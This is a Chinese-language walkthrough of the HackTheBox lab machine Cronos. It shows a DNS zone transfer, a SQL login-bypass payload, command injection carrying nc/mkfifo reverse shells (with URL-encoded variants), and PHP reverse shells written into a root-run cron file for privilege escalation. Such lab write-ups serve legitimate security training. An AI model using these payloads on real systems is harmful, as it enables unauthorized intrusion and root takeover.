Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.


HackTheBox >_ Cronos_13

Cronos_13

image-20200925091734250

image-20200925091752511

扫描存在domain 先把ip解析存入host,随便命名。 然后dig一下,找出真实存在的域名

image-20200925091837982

$ dig axfr @10.10.10.13 cronos.htb

image-20200925091920701

将新的域名加入host,逐个浏览

admin.cronos.htb有机会

image-20200925092138120

burpsuite打sql登陆绕过

image-20200925092243259

随便使用打出来能绕过登陆的payload绕过登陆限制admin' #

image-20200925092259581

明显命令注入 抓包观察

image-20200925092359600

试着直接修改命令,操作靶机使用nc打个shell回kali

注意由于&会被用于分割两个参数,所以要把&符号转义成%26,

正常命令:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.41 1234 >/tmp/f

写法1:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.14.41 1234 >/tmp/f

写法2:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.41+1234+>/tmp/f

image-20200925092527707

在kali监听端口得到shell

image-20200925092558195

得到user

image-20200925092645793

上传linEnum进行进一步枚举

image-20200925093027859

image-20200925093329387

进一步枚举发现计划任务

image-20200925093411618

检查权限

image-20200925093458971

注意是拥有者是www-data,权限可写入。这个任务却是在任务中 是以root执行,。

而执行程序是php。可以直接echo更改执行程序的内容!

常规语句

$ echo '<?php $sock=fsockopen("10.10.14.41",9999);exec("/bin/bash -i &3 2>&3"); ?>' > /var/www/laravel/artisan

打了发现回讯会断不稳定

换了使用pipe通道的语句

$ echo '<?php $sock = fsockopen("10.10.14.41",1337);$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);?>' > /var/www/laravel/artisan

成功,在监听端口获得root shell

image-20200925093859993